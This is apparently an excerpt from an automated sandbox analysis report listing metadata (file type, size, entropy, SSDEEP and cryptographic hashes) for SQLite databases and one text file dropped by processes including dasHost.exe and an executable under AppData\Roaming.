                                                                        File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):20480
                                                                        Entropy (8bit):0.5707520969659783
                                                                        Encrypted:false
                                                                        SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                        MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                        SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                        SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                        SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                        Category:dropped
                                                                        Size (bytes):114688
                                                                        Entropy (8bit):0.9746603542602881
                                                                        Encrypted:false
                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                        Category:dropped
                                                                        Size (bytes):114688
                                                                        Entropy (8bit):0.9746603542602881
                                                                        Encrypted:false
                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):20480
                                                                        Entropy (8bit):0.5707520969659783
                                                                        Encrypted:false
                                                                        SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                        MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                        SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                        SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                        SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):20480
                                                                        Entropy (8bit):0.5712781801655107
                                                                        Encrypted:false
                                                                        SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                        MD5:05A60B4620923FD5D53B9204391452AF
                                                                        SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                        SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                        SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):20480
                                                                        Entropy (8bit):0.5707520969659783
                                                                        Encrypted:false
                                                                        SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                        MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                        SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                        SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                        SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):106496
                                                                        Entropy (8bit):1.1358696453229276
                                                                        Encrypted:false
                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):20480
                                                                        Entropy (8bit):0.5707520969659783
                                                                        Encrypted:false
                                                                        SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                        MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                        SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                        SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                        SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):49152
                                                                        Entropy (8bit):0.8180424350137764
                                                                        Encrypted:false
                                                                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                        MD5:349E6EB110E34A08924D92F6B334801D
                                                                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):20480
                                                                        Entropy (8bit):0.5712781801655107
                                                                        Encrypted:false
                                                                        SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                        MD5:05A60B4620923FD5D53B9204391452AF
                                                                        SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                        SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                        SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):98304
                                                                        Entropy (8bit):0.08235737944063153
                                                                        Encrypted:false
                                                                        SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                        MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                        SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                        SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                        SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                        Category:dropped
                                                                        Size (bytes):28672
                                                                        Entropy (8bit):2.5793180405395284
                                                                        Encrypted:false
                                                                        SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                        MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                        SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                        SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                        SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):106496
                                                                        Entropy (8bit):1.1358696453229276
                                                                        Encrypted:false
                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                        Category:dropped
                                                                        Size (bytes):114688
                                                                        Entropy (8bit):0.9746603542602881
                                                                        Encrypted:false
                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                        Category:dropped
                                                                        Size (bytes):28672
                                                                        Entropy (8bit):2.5793180405395284
                                                                        Encrypted:false
                                                                        SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                        MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                        SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                        SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                        SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                        Category:dropped
                                                                        Size (bytes):114688
                                                                        Entropy (8bit):0.9746603542602881
                                                                        Encrypted:false
                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                        Category:dropped
                                                                        Size (bytes):114688
                                                                        Entropy (8bit):0.9746603542602881
                                                                        Encrypted:false
                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):20480
                                                                        Entropy (8bit):0.5712781801655107
                                                                        Encrypted:false
                                                                        SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                        MD5:05A60B4620923FD5D53B9204391452AF
                                                                        SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                        SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                        SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):40960
                                                                        Entropy (8bit):0.8553638852307782
                                                                        Encrypted:false
                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):106496
                                                                        Entropy (8bit):1.1358696453229276
                                                                        Encrypted:false
                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):40960
                                                                        Entropy (8bit):0.8553638852307782
                                                                        Encrypted:false
                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):40960
                                                                        Entropy (8bit):0.8553638852307782
                                                                        Encrypted:false
                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):106496
                                                                        Entropy (8bit):1.1358696453229276
                                                                        Encrypted:false
                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                        Category:dropped
                                                                        Size (bytes):114688
                                                                        Entropy (8bit):0.9746603542602881
                                                                        Encrypted:false
                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                        Category:dropped
                                                                        Size (bytes):28672
                                                                        Entropy (8bit):2.5793180405395284
                                                                        Encrypted:false
                                                                        SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                        MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                        SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                        SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                        SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):98304
                                                                        Entropy (8bit):0.08235737944063153
                                                                        Encrypted:false
                                                                        SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                        MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                        SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                        SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                        SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):20480
                                                                        Entropy (8bit):0.5712781801655107
                                                                        Encrypted:false
                                                                        SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                        MD5:05A60B4620923FD5D53B9204391452AF
                                                                        SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                        SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                        SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):20480
                                                                        Entropy (8bit):0.5712781801655107
                                                                        Encrypted:false
                                                                        SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                        MD5:05A60B4620923FD5D53B9204391452AF
                                                                        SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                        SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                        SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                        Malicious:false
                                                                        Process:C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe
                                                                        File Type:ASCII text, with very long lines (399), with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):399
                                                                        Entropy (8bit):5.838496062654911
                                                                        Encrypted:false
                                                                        SSDEEP:12:NeEBynjwChTVIQBscLbEYPAuCcCyTBfjtdKqq:NRBu5vmcLbEIFCaBfrKqq
                                                                        MD5:8C74DA3B95FB50EDC36921D56E549D7F
                                                                        SHA1:DDA7B9FE2ED31A7E61D4C09A224996DD61407742
                                                                        SHA-256:76971963CBE1FA4B192E2811254BED3E29063CA3021503F5F4D268014A26D163
                                                                        SHA-512:E9810905C706E809F5598732487007FEDF4335727565625D83CEB2EE6FA298464E5F663CB7189E998BB172372A6C36889C0CB2F480B36C6B2F5C2B9B416D4A34
                                                                        Malicious:false
